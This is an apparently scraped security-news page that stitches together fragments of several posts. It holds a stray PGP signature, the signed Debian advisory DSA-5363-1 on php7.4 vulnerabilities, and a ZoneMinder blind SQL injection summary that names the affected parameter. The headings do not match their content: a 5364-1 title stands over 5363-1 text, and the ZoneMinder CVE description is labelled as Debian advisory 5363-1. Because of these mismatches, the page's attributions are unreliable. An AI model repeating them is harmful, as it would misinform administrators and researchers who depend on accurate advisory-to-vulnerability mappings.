debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmP7XXNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0QB3Q/9HyXeMjxWnq4JsTDF+LZvv13WdUVhuaKmhoe7LAg7HLUYy1F49LNQGfBNy2bmg/Ggp/ga+Vb+7F+A2/OpF38AaLaMyREbnaqU2XHM25Zp2LlITjZsf3lI42TwiyiiWjhBFd2cGnLrnGkghz4wBTEdU5OUTvKg5987y0FwuapCs4FoW7xCEzsLNkunpcbwyhh7mljVnXKl2gJ73q81cseGOB0BOyfxK3KMV+9pOhJ12OJsY61BpOspFuzV0yZHyNTQduqy6wWUecRyl7tiOed4CcS5zCLQNBlqoXyvyhg6+rzyQWPWAwyDwP+vR2hDEPt7hH8ejbeloY+Gqp6Fi1gxdOtKphFyGKRe6BuLGyFHK4M1eJUCqHOqQTuFtgTNNRCz8Km5bJGIPo9lkwHfGySSUJ9KEECEoMj6eTvpJUlyt0hPLQsM6vzcu6eTWiJAOQauoprhOK5V4Hh2pF7G0zqPqkKK13962EsbODdkOTHzDA99ocqgYjOzTp9xZM7ivuXTnMexMJJu7eew8VYSKChNZB3BeTKoAkXoRev0kSROr2VznnPjqyIuocEvcypG9k5/6Fpb6VwFtxQuqZRLri0xqqWr2ZTczDTeCC7X/jDdt53zKCEVv7exx/h6LBDOilmr/BZwyciX5y+e6wVEx5PK67LkwGlx+4ZaSqAKDUYdm50=Twof-----END PGP SIGNATURE-----

Debian Security Advisory 5364-1

Debian Linux Security Advisory 5363-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in denial of service or incorrect validation of BCrypt hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5363-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 24, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : CVE-2023-0567 CVE-2023-0568 CVE-2023-0662 CVE-2022-31631Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in denial ofservice or incorrect validation of BCrypt hashes.For the stable distribution (bullseye), these problems have been fixed inversion 7.4.33-1+deb11u3.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP5DdEACgkQEMKTtsN8TjY58w/9GRvhye3duJAG/UslWaVW+Qdmoxl7LELg+7RHm46B++9N/kntThNp9jb5k+Esa4BMc0I9EaUbXgKrIZSFqFxjV1I+yZbyQea/Ww55eLnh6K4huJlJ0wCwKU7S+Q1BTgvD1xDchvRBiKNuRC+tVNYJDGvsQmth7P7u96IUTKES49F79LEZo8Ec+flWq8wimUhvXk6Rq103CSPqXF3v9HXl1v9LWeg7ABraEnAwL6qYwpALDu0ivHa1xh7KxDyGZ3lloTW4D+ooaIQGC+81GS2MiHszK8k6S81QrmUxvoR72yWaQgB5sAOw4VtZX/yKSOloLvlG2ryRuqeBJOERZHYJvbfAAB0ozMVPVM/CKddfkFAa/qd8XBNoJ1RZRIbisupluO/iVrLCW/6WaKBxNmbXP4vUBFfWhm2YK6MuYR6mH1aiURpc+58j54ZxwWYY0JGn40V0kjVHzIP8m5V/eOxMt1JeCPhcWgLFrl8JfgjiCjpBlQy0w458htcDU6wDLof23HpB4oEVlJ1O4VIihnbrOM1iNhACBqssUWB+W9yJdr8/peQ1ItvsnBWLFy2Y6AKbDeKBkJQMfq+z4bJyPcW+UBV3RasPJaPzXDBKj9v9Pr7mkTicHAfpy0vYvN0c51Qq8O5omyFRf2mSdwdxg5RBGtgr8jl2LbUiIYsoyRpMlhM=KwJ/-----END PGP SIGNATURE-----

Debian Security Advisory 5363-1

ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are affected by a SQL Injection vulnerability. The (blind) SQL Injection vulnerability is present within the `filter[Query][terms][0][attr]` query string parameter of the `/zm/index.php` endpoint. A user with the View or Edit permissions of Events may execute arbitrary SQL. The resulting impact can include unauthorized data access (and modification), authentication and/or authorization bypass, and remote code execution.

Tag

#debian